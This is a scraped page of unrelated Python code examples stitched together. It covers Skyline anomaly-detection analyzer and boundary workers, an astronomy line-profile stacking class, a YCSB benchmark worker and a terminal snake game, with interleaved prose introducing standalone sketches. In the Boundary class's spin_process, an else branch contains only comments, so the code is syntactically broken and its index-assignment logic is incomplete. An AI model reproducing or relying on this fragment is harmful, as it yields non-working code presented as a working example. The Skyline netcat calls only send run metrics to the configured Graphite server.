            # Analyzer running over some metrics multiple times in a minute
            # and always working, because the sleep only happened if the run
            # took less than 5 seconds.  That behaviour resulted in Analyzer
            # analysing a few 1000 metrics in 9 seconds and then doing it
            # again and again within a single minute.  The
            # ANALYZER_OPTIMUM_RUN_DURATION setting was therefore added to
            # allow this to self optimise in cases where skyline is NOT
            # deployed to analyze 100s of 1000s of metrics.  This relates to
            # optimising performance for deployments in the few 1000s of
            # metrics and 60 second resolution range, e.g. smaller and local
            # deployments.
            process_runtime = time() - now
            analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION
            if process_runtime < analyzer_optimum_run_duration:
                sleep_for = (analyzer_optimum_run_duration - process_runtime)
                logger.info('sleeping for %.2f seconds due to low run time...' % sleep_for)
                sleep(sleep_for)
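The loop above that spawns the spin_process workers and then polls them against settings.MAX_ANALYZER_PROCESS_RUNTIME, terminating any that overrun, is a self-contained pattern. Below is a minimal standalone sketch of that watchdog using only the standard library; the worker function, the 10 second limit and the fake work items are illustrative placeholders, not part of the original source.

from multiprocessing import Process
from time import sleep, time


def worker(i, items):
    # Placeholder for spin_process: pretend to analyse the assigned items
    sleep(0.5 * i)


def run_with_watchdog(items, processes=4, max_runtime=10):
    pids = []
    for i in range(1, processes + 1):
        p = Process(target=worker, args=(i, items))
        pids.append(p)
        p.start()

    started = time()
    while time() - started <= max_runtime:
        if any(p.is_alive() for p in pids):
            # Just to avoid hogging the CPU while polling
            sleep(0.1)
        else:
            # All workers finished inside the allowed runtime
            break
    else:
        # Only reached when the loop timed out rather than breaking
        for p in pids:
            p.terminate()
            p.join()


if __name__ == '__main__':
    run_with_watchdog(['metric.%d' % n for n in range(100)])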
Ejemplo n.º 34
0
class load(object):
    
    def __init__(self, imagename, catalogname, 
                 width=1, beam=None, delimiter=",", 
                 verbosity=0, beam2pix=False, cores=2):

        self.log = utils.logger(verbosity)
        self.active = Manager().Value("d", 0)
        self.cores = cores

        self.log.info("Laoding Image data and catalog info")

        self.imagename = imagename
        self.catalogname = catalogname
        self.delimiter = delimiter

        # Load data
        self.catalog = numpy.loadtxt(self.catalogname, delimiter=self.delimiter)
        self.nprofs = len(self.catalog)
        
        self.data, self.hdr, self.wcs = utils.loadFits(imagename)

        self.ndim = self.hdr["naxis"]
        self.centre = self.wcs.getCentreWCSCoords()

        self.log.info("Image Centre RA,DEC {:+.3g}, {:+.3g} Deg".format(*self.centre))
        
        cubeslice = [slice(None)]*self.ndim
        if self.ndim >3:
            stokes_ind = self.ndim - utils.fitsInd(self.hdr, "STOKES")
            cubeslice[stokes_ind] = 0

        self.cube = self.data[cubeslice]

        self.profiles = Manager().list([])
        self.weights = Manager().Value("d", 0)

        ind = utils.fitsInd(self.hdr, "FREQ")
        self.crpix = self.hdr["crpix%d"%ind]
        self.crval = self.hdr["crval%d"%ind]
        self.dfreq = self.hdr["cdelt%d"%ind]
        self.freq0 = self.crval + (self.crpix-1)*self.dfreq
        self.nchan = self.hdr["naxis%d"%ind]
        self.width = int(width*1e6/self.dfreq)

        # Find restoring beam in FITS header if not specified
        if isinstance(beam, (float, int)):
            if beam==0:
                beam = None
            else:
                self.bmaj = self.bmin = beam/3600.
                self.bpa = 0
        elif isinstance(beam, (list, tuple)):
            self.bmaj, self.bmin, self.bpa = beam
            self.bmaj /= 3600.
            self.bmin /= 3600.

        elif beam is None:
            try:
                self.bmaj = self.hdr["bmaj"]
                self.bmin = self.hdr["bmin"]
                self.bpa = self.hdr["bpa"]
            except KeyError: 
                self.log.critical("Beam not specified, and no beam information in FITS header")
        else:
            raise TypeError("Beam must be a list, tuple, int or float")

        self.bmajPix = int(self.bmaj/abs( self.wcs.getXPixelSizeDeg() ) )
        self.bminPix = int(self.bmin/abs( self.wcs.getXPixelSizeDeg() ) )

        self.beamPix = self.bmajPix
        self.beam2pix = beam2pix
    
        self.excluded = Manager().Value("d",0)
        self.track = Manager().Value("d",0)
        self.lock = Lock()


    def profile(self, radeg, decdeg, cfreq, weight, pid):
        
        rapix, decpix = self.wcs.wcs2pix(radeg, decdeg)

        cfreqPix = int((cfreq - self.freq0)/self.dfreq )

        zstart = cfreqPix - self.width/2
        zend = cfreqPix + self.width/2

        beamPix = self.beamPix

        ystart, yend = (decpix-beamPix/2.), (decpix+beamPix/2.)
        xstart, xend = (rapix-beamPix/2.), (rapix+beamPix/2.)

        self.log.debug("Line profile {:.3f} {:.3f} {:d}-{:d}".format(rapix, decpix, zstart, zend))
        
        pcube = self.cube[zstart:zend, ystart:yend, xstart:xend]

        # Check if this profile is with stacking

        if pcube.shape != (self.width, beamPix, beamPix):
            padz, pady, padx = (0,0), (0,0), (0,0)
            diffx, diffy, diffz = 0, 0, 0

            if pcube.shape[0] != self.width:
                diffz = self.width - pcube.shape[0]
                if cfreqPix < self.cube.shape[0]/2:
                    padz = diffz, 0
                else:
                    padz = 0, diffz

            if pcube.shape[1] != beamPix:
                diffy = beamPix - pcube.shape[1]
                if ystart<0:
                    pady = diffy, 0
                else:
                    pady = 0, diffy
                
            if pcube.shape[2] != beamPix:
                diffx = beamPix - pcube.shape[2]
                if xstart<0:
                    padx = diffx, 0
                else:
                    padx = 0, diffx

            if diffz > self.width/2 or diffx > beamPix/2 or diffy > beamPix/2:
                self.log.debug("Skipping Profile {:d}, its close too an edge (s).".format(pid))
                self.excluded.value += 1
                return
            else:
                npad = padz, pady, padx
                self.log.debug("Profile {:d} is close an edge(s). Padding the exctracted cube by {:s} ".format(pid, repr(npad)))

                pcube = numpy.pad(pcube, pad_width=npad, mode="constant")
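                # Illustrative (hypothetical shapes): with self.width = 10 and
                # beamPix = 6, an extracted pcube of shape (8, 6, 5) that fell
                # off the low frequency and low x edges would give
                # npad = ((2, 0), (0, 0), (1, 0)), and numpy.pad zero fills it
                # back to the expected (10, 6, 6) shape.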
        else:
            self.log.debug("Extracting profile {:d}".format(pid))

        self.lock.acquire()
        self.weights.value += weight
        self.track.value += 1
        self.profiles.append(pcube*weight)
        self.lock.release()
        self.active.value -= 1

        
    def stack(self):

        nprofs = len(self.catalog)
        
        self.log.info("Stacking {:d} line profiles".format(nprofs))

        # Run these jobs in parallel
        procs = []
        range_ = range(10, 110, 10)
        print("Progress:"),

        counter = 0
        while counter <= nprofs-1:
            if self.active.value >= self.cores:
                continue

            ra, dec, cfreq, w, _id = self.catalog[counter]
            proc = Process(target=self.profile, args = (ra, dec, cfreq, w, counter) )
            proc.start()
            procs.append(proc)
            counter += 1
            self.active.value += 1

            nn = int(self.track.value/float(self.nprofs)*100)
            if nn in range_:
                print("..{:d}%".format(nn)),
                range_.remove(nn)
        
        for proc in procs:
            proc.join()

        print("..100%\n")

        self.log.info("Have stackem all")
        self.log.info("{:d} out of {:d} profiles were excluded because they \
were too close to an edge".format(self.excluded.value, nprofs))
        
        stack = numpy.sum(self.profiles, 0)

        if self.beam2pix:
            mask = utils.elliptical_mask(stack[0], self.bmajPix/2, self.bminPix/2, self.bpa)
            stack = utils.gauss_weights(stack, self.bmajPix/2, self.bminPix/2, mask=mask)

        profile = stack.sum((1, 2))/self.weights.value

        return profile


    def fit_gaussian(self, profile):

        nn = len(profile)
        xx = range(nn)
        import scipy.stats as stats
        from scipy.optimize import leastsq

        sigma = 1 #stats.moment(profile, moment=1)
        mu = xx[nn/2]
        peak = profile.max()
        
        def res(p0, x, y):
            peak, mu, sigma = p0
            yf = utils.gauss(x, peak, mu, sigma)
            return y - yf
    
        params = leastsq(res, (peak, mu, sigma), args=(xx, profile))[0]
        
        return params
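For context, fit_gaussian above relies on the project's utils.gauss. The following is a minimal self-contained sketch of the same least-squares fit, assuming a locally defined gauss as a stand-in for utils.gauss and a synthetic noisy profile as input.

import numpy
from scipy.optimize import leastsq


def gauss(x, peak, mu, sigma):
    # Local stand-in for the project's utils.gauss
    return peak * numpy.exp(-0.5 * ((x - mu) / sigma) ** 2)


def fit_gaussian(profile):
    # Same least-squares residual fit as the method above, made standalone
    nn = len(profile)
    xx = numpy.arange(nn)
    p0 = (profile.max(), nn // 2, 1.0)  # initial peak, centre and width

    def res(p, x, y):
        peak, mu, sigma = p
        return y - gauss(x, peak, mu, sigma)

    return leastsq(res, p0, args=(xx, profile))[0]


# Fit a noisy synthetic line profile and recover its parameters
xx = numpy.arange(50)
profile = gauss(xx, 3.0, 25.0, 4.0) + numpy.random.normal(0, 0.05, 50)
peak, mu, sigma = fit_gaussian(profile)
print('peak=%.2f mu=%.2f sigma=%.2f' % (peak, mu, sigma))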
Ejemplo n.º 35
0
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.lock = Lock()
        self.exceptions = Manager().dict()
        self.anomaly_breakdown = Manager().dict()
        self.anomalous_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries)

                # If it's anomalous, add it to list
                if anomalous:
                    metric = [datapoint, metric_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except AttributeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Collate process-specific dicts to main dicts
        with self.lock:
            for key, value in anomaly_breakdown.items():
                if key not in self.anomaly_breakdown:
                    self.anomaly_breakdown[key] = value
                else:
                    self.anomaly_breakdown[key] += value

            for key, value in exceptions.items():
                if key not in self.exceptions:
                    self.exceptions[key] = value
                else:
                    self.exceptions[key] += value

    def run(self):
        """
        Called when the process initializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Write anomalous_metrics to static webapp directory
            filename = path.abspath(path.join(path.dirname( __file__ ), '..', settings.ANOMALY_DUMP))
            with open(filename, 'w') as fh:
                # Make it JSONP with a handle_data() function
                anomalous_metrics = list(self.anomalous_metrics)
                anomalous_metrics.sort(key=operator.itemgetter(1))
                fh.write('handle_data(%s)' % anomalous_metrics)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(self.exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % self.exceptions)
            logger.info('anomaly breakdown :: %s' % self.anomaly_breakdown)

            # Log to Graphite
            if settings.GRAPHITE_HOST != '':
                host = settings.GRAPHITE_HOST.replace('http://', '')
                system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                if settings.GRAPHITE_HOST != '':
                    host = settings.GRAPHITE_HOST.replace('http://', '')
                    system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host))
                    system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host))


            # Reset counters
            self.anomalous_metrics[:] = []
            self.exceptions = Manager().dict()
            self.anomaly_breakdown = Manager().dict()

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
Ejemplo n.º 36
0
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        if settings.GRAPHITE_HOST != '':
            sock = socket.socket()
            sock.connect((settings.CARBON_HOST.replace('http://', ''), settings.CARBON_PORT))
            sock.sendall('%s %s %i\n' % (name, value, time()))
            sock.close()
            return True

        return False

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process initializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        if alert[0] in metric[1]:
                            cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.redis_conn.get(cache_key)
                                if not last_alert:
                                    self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                    trigger_alert(alert, metric)

                            except Exception as e:
                                logger.error("couldn't send alert: %s" % e)

            # Write anomalous_metrics to static webapp directory
            filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
            with open(filename, 'w') as fh:
                # Make it JSONP with a handle_data() function
                anomalous_metrics = list(self.anomalous_metrics)
                anomalous_metrics.sort(key=operator.itemgetter(1))
                fh.write('handle_data(%s)' % anomalous_metrics)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('skyline.analyzer.run_time', '%.2f' % (time() - now))
            self.send_graphite_metric('skyline.analyzer.total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values())))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                self.send_graphite_metric('skyline.analyzer.duration', '%.2f' % time_human)
                self.send_graphite_metric('skyline.analyzer.projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
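send_graphite_metric in the example above pushes one 'name value timestamp' line over a TCP socket, which is Carbon's plaintext protocol. Below is a minimal standalone sketch of the same idea; the host, port, metric name and value are illustrative placeholders rather than values from the original settings.

import socket
import time


def send_graphite_metric(name, value, host='127.0.0.1', port=2003):
    # One "metric.path value unix_timestamp\n" line per datapoint
    line = '%s %s %d\n' % (name, value, int(time.time()))
    try:
        sock = socket.create_connection((host, port), timeout=3)
    except socket.error:
        return False
    try:
        sock.sendall(line.encode('utf-8'))
    finally:
        sock.close()
    return True


send_graphite_metric('skyline.analyzer.run_time', '4.27')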
Ejemplo n.º 37
0
class YCSBWorker(object):
    def __init__(self, access_settings, remote, test, ycsb):
        self.workers = access_settings.workers
        self.remote = remote
        self.test = test
        self.timer = access_settings.time
        self.ycsb = ycsb
        self.shutdown_event = self.timer and Event() or None
        self.ycsb_result = Manager().dict({key: [] for key in ['Throughput', 'READ_95', 'UPDATE_95', 'INSERT_95', 'SCAN_95']})
        self.ycsb_logfiles = Manager().list()
        self.task = self.ycsb_work

    def time_to_stop(self):
        return (self.shutdown_event is not None and
                self.shutdown_event.is_set())

    def ycsb_work(self, mypid):
        flag = True
        log_file = '{}_{}.txt'.format(self.ycsb.log_path +
                                      self.ycsb.log_file, str(mypid))
        self.ycsb_logfiles.append(log_file)
        self.run_cmd = self.test.create_load_cmd(action="run", mypid=mypid)
        self.run_cmd += ' -p exportfile={}'.format(log_file)
        try:
            while flag and not self.time_to_stop():
                self.remote.ycsb_load_run(self.ycsb.path,
                                          self.run_cmd,
                                          log_path=self.ycsb.log_path,
                                          mypid=mypid)
                flag = False
        except Exception as e:
            raise YCSBException('Error while running YCSB load: ' + str(e))

    def pattern(self, line):
        ttype, measure, value = map(str.strip, line.split(','))
        key = ''
        if ttype == "[OVERALL]" and measure == "Throughput(ops/sec)":
            key = 'Throughput'
        elif ttype == "[READ]" and measure == "95thPercentileLatency(us)":
            key = 'READ_95'
        elif ttype == "[UPDATE]" and measure == "95thPercentileLatency(us)":
            key = 'UPDATE_95'
        elif ttype == "[INSERT]" and measure == "95thPercentileLatency(us)":
            key = 'INSERT_95'
        elif ttype == "[SCAN]" and measure == "95thPercentileLatency(us)":
            key = 'SCAN_95'
        else:
            return
        self.ycsb_result[key] += [round(float(value))]

    def parse_work(self, mypid):
        filename = self.ycsb_logfiles[mypid]
        with open(filename, "r") as txt:
            for line in txt:
                self.pattern(line)

    def run(self):
        processes = [Process(target=self.task, args=(x,)) for x in range(self.workers)]
        for p in processes:
            p.start()

        for p in processes:
            p.join()
            if p.exitcode:
                logger.interrupt('Worker finished with non-zero exit code')

    def parse(self):
        self.task = self.parse_work
        self.run()
        return np.sum(self.ycsb_result['Throughput']), \
            np.mean(self.ycsb_result['READ_95']), \
            np.mean(self.ycsb_result['UPDATE_95']), \
            np.mean(self.ycsb_result['INSERT_95']), \
            np.mean(self.ycsb_result['SCAN_95'])
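YCSBWorker.pattern above keys off the '[TYPE], measurement, value' lines that YCSB writes to its exportfile. The snippet below is a small standalone sketch of that parsing logic on hypothetical sample lines; the line contents are illustrative, not captured from a real run.

from collections import defaultdict

# Hypothetical exportfile lines in the "[TYPE], measurement, value" layout
# that YCSBWorker.pattern() expects
sample_lines = [
    '[OVERALL], Throughput(ops/sec), 4200.0',
    '[READ], 95thPercentileLatency(us), 1250.0',
    '[UPDATE], 95thPercentileLatency(us), 1810.0',
]

wanted = {
    ('[OVERALL]', 'Throughput(ops/sec)'): 'Throughput',
    ('[READ]', '95thPercentileLatency(us)'): 'READ_95',
    ('[UPDATE]', '95thPercentileLatency(us)'): 'UPDATE_95',
    ('[INSERT]', '95thPercentileLatency(us)'): 'INSERT_95',
    ('[SCAN]', '95thPercentileLatency(us)'): 'SCAN_95',
}

results = defaultdict(list)
for line in sample_lines:
    ttype, measure, value = map(str.strip, line.split(','))
    key = wanted.get((ttype, measure))
    if key:
        results[key].append(round(float(value)))

print(dict(results))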
Ejemplo n.º 38
0
    print()
    system('setterm -cursor on')  # Show the cursor again if the user hits CTRL+C
    exit(0)



snake_list = []
snake_direction = Manager().Value('ctypes.c_char_p', "right")   ## Value shared with the other process
snake_blocks = Manager().Value('i', 2)
game_speed = Manager().Value('f', .5)

posLargSnake = Manager().Value('i', 1)
posLongSnake = Manager().Value('i', 1)

snake_head = Manager().list()
snake_head.append(1)
snake_head.append(2)

point_pos = Manager().list()
score = Manager().Value('i', 0)
game_over = Manager().Value('b', False)
pause = Manager().Value('b', False)
printed_pause = Manager().Value('b', True)
touche = Manager().Value('i', 0)

colored_space = Manager().Value('ctypes.c_char_p', colored(' ', 'grey', 'on_grey'))
colored_snake_body = Manager().Value('ctypes.c_char_p', colored('x', 'green', 'on_green'))
colored_snake_head = Manager().Value('ctypes.c_char_p', colored('x', 'white', 'on_white'))
colored_point = Manager().Value('ctypes.c_char_p', colored('o', 'red', 'on_red'))

signal.signal(signal.SIGINT, quit)
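The snake snippet above shares its state between the drawing loop and a key-reading process through Manager().Value proxies. Below is a minimal standalone sketch of that sharing pattern; the process function and the values it writes are illustrative placeholders.

from multiprocessing import Manager, Process
from time import sleep


def input_loop(direction, game_over):
    # Stand-in for the key-reading process: it only writes the shared values,
    # the drawing loop below only reads them
    for key in ('up', 'left', 'down'):
        sleep(0.1)
        direction.value = key
    game_over.value = True


if __name__ == '__main__':
    manager = Manager()
    direction = manager.Value('ctypes.c_char_p', 'right')
    game_over = manager.Value('b', False)

    p = Process(target=input_loop, args=(direction, game_over))
    p.start()
    while not game_over.value:
        print('drawing frame, snake heading %s' % direction.value)
        sleep(0.05)
    p.join()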
Ejemplo n.º 39
0
class Boundary(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Boundary
        """
        super(Boundary, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.boundary_metrics = Manager().list()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        if settings.GRAPHITE_HOST != '':
            sock = socket.socket()

            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
            except socket.error:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error('Cannot connect to Graphite at %s' % endpoint)
                return False

            sock.sendall('%s %s %i\n' % (name, value, time()))
            sock.close()
            return True

        return False

    def unique_noHash(self, seq):
        seen = set()
        return [x for x in seq if str(x) not in seen and not seen.add(str(x))]
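    # Illustrative: unique_noHash([[1, 2], [1, 2], [3]]) returns [[1, 2], [3]].
    # Unlike set() it preserves order and copes with unhashable items such as
    # lists or tuples, by deduplicating on str(x).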

    # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True
    # for dumping the metric timeseries data into for debugging purposes
    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        except OSError as exc:
            # Python >2.5
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def spin_process(self, i, boundary_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Determine assigned metrics
        bp = settings.BOUNDARY_PROCESSES
        bm_range = len(boundary_metrics)
        keys_per_processor = int(ceil(float(bm_range) / float(bp)))
        if i == settings.BOUNDARY_PROCESSES:
            assigned_max = len(boundary_metrics)
        else:
            # This is a skyline bug, the original skyline code uses 1 as the
            # beginning position of the index, whereas python indices begin
            # with 0
            # assigned_max = len(boundary_metrics)
            # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014
            # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)
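        # Worked example (hypothetical numbers): with 10 boundary metrics and
        # BOUNDARY_PROCESSES = 4, keys_per_processor = ceil(10 / 4) = 3, so
        # process 1 gets indices 0-2, process 2 gets 3-5, process 3 gets 6-8
        # and process 4 (the last, i == BOUNDARY_PROCESSES) gets index 9.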

        # Compile assigned metrics
        assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys]
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - printing assigned_metrics_and_algos')
            for assigned_metric_and_algo in assigned_metrics_and_algos:
                logger.info('debug - assigned_metric_and_algo - %s' % str(assigned_metric_and_algo))

        # Extract just the metric names from the (metric, algorithm) tuples
        assigned_metrics = []
        for i in assigned_metrics_and_algos:
            assigned_metrics.append(i[0])

        # unique unhashed things
        def unique_noHash(seq):
            seen = set()
            return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

        unique_assigned_metrics = unique_noHash(assigned_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - unique_assigned_metrics - %s' % str(unique_assigned_metrics))
            logger.info('debug - printing unique_assigned_metrics:')
            for unique_assigned_metric in unique_assigned_metrics:
                logger.info('debug - unique_assigned_metric - %s' % str(unique_assigned_metric))

        # Check if this process is unnecessary
        if len(unique_assigned_metrics) == 0:
            return

        # Multi get series
        try:
            raw_assigned = self.redis_conn.mget(unique_assigned_metrics)
        except:
            logger.error("failed to mget assigned_metrics from redis")
            return

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Reset boundary_algorithms
        all_boundary_algorithms = []
        for metric in BOUNDARY_METRICS:
            all_boundary_algorithms.append(metric[1])

        # The unique algorithms that are being used
        boundary_algorithms = unique_noHash(all_boundary_algorithms)
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - boundary_algorithms - %s' % str(boundary_algorithms))

        discover_run_metrics = []

        # Distill metrics into a run list
        for i, metric_name in enumerate(unique_assigned_metrics):
